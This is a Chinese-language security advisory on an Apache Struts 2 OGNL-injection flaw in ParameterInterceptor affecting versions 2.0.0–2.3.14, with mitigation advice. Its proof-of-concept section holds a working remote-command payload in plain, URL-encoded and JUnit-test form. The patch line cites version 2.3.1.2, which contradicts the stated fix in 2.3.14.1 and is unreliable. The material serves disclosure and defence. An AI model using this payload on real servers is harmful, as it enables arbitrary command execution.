Apache Struts “ParameterInterceptor”安全绕过漏洞
发布日期:2013-05-22
更新日期:2013-05-23
受影响系统:
Apache Group Struts 2.0.0 - 2.3.14
描述:
--------------------------------------------------------------------------------
Apache Struts是一款开发Java web应用程序的开源Web应用框架。
Apache Struts 2.3.14.1之前版本在"ParameterInterceptor"类的实现上存在错误,可被利用修改服务器端对象,也可以通过特制的OGNL表达式绕过ParametersInterceptor及OGNL库保护,从而达到执行任意命令的目的。
<*来源:Xgc Kxlzx
链接:http://secunia.com/advisories/53495/
http://struts.apache.org/development/2.x/docs/s2-012.html
http://struts.apache.org/development/2.x/docs/s2-013.html
http://www.freebuf.com/vuls/9757.html
http://struts.apache.org/development/2.x/docs/security-bulletins.html
*>
测试方法:
--------------------------------------------------------------------------------
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
Proof of concept
Vulnerable Action
public class FooAction {
private String foo;
public String execute() {
return "success";
}
public String getFoo() {
return foo;
}
public void setFoo(String foo) {
this.foo = foo;
}
}
Here's an actual decoded example, which will create /tmp/PWNAGE directory:
/action?foo=(#context["xwork.MethodAccessor.denyMethodExecution"]= new java.lang.Boolean(false), #_memberAccess["allowStaticMethodAccess"]= new java.lang.Boolean(true), @java.lang.Runtime@getRuntime().exec('mkdir /tmp/PWNAGE'))(meh)&z[(foo)('meh')]=true
encoded version:
/action?foo=%28%23context[%22xwork.MethodAccessor.denyMethodExecution%22]%3D+new+java.lang.Boolean%28false%29,%20%23_memberAccess[%22allowStaticMethodAccess%22]%3d+new+java.lang.Boolean%28true%29,%[email protected]@getRuntime%28%29.exec%28%27mkdir%20/tmp/PWNAGE%27%29%29%28meh%29&z[%28foo%29%28%27meh%27%29]=true
And the JUnit version
PoC
public class FooActionTest extends org.apache.struts2.StrutsJUnit4TestCase<FooAction> {
@Test
public void testExecute() throws Exception {
request.setParameter("foo", "(#context[\"xwork.MethodAccessor.denyMethodExecution\"]= new " +
"java.lang.Boolean(false), #_memberAccess[\"allowStaticMethodAccess\"]= new java.lang.Boolean(true), " +
"@java.lang.Runtime@getRuntime().exec('mkdir /tmp/PWNAGE'))(meh)");
request.setParameter("top['foo'](0)", "true");
String res = this.executeAction("/example/foo.action");
FooAction action = this.getAction();
File pwn = new File("/tmp/PWNAGE");
Assert.assertFalse("Remote exploit: The PWN folder has been created", pwn.exists());
}
}
建议:
--------------------------------------------------------------------------------
临时解决方法:
如果您不能立刻安装补丁或者升级,NSFOCUS建议您采取以下措施以降低威胁:
* 配置struts.xml内的ParametersIntercptor,以排除恶意参数。此外正确应用下面的interceptor-ref配置,就可以仅允许简单导航表达式:
<interceptor-ref name="params">
<param name="acceptParamNames">\w+((\.\w+)|(\[\d+\])|(\['\w+'\]))*</param>
</interceptor-ref>
厂商补丁:
Apache Group
------------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载 Struts 2.3.1.2:
http://struts.apache.org/download.cgi#struts2312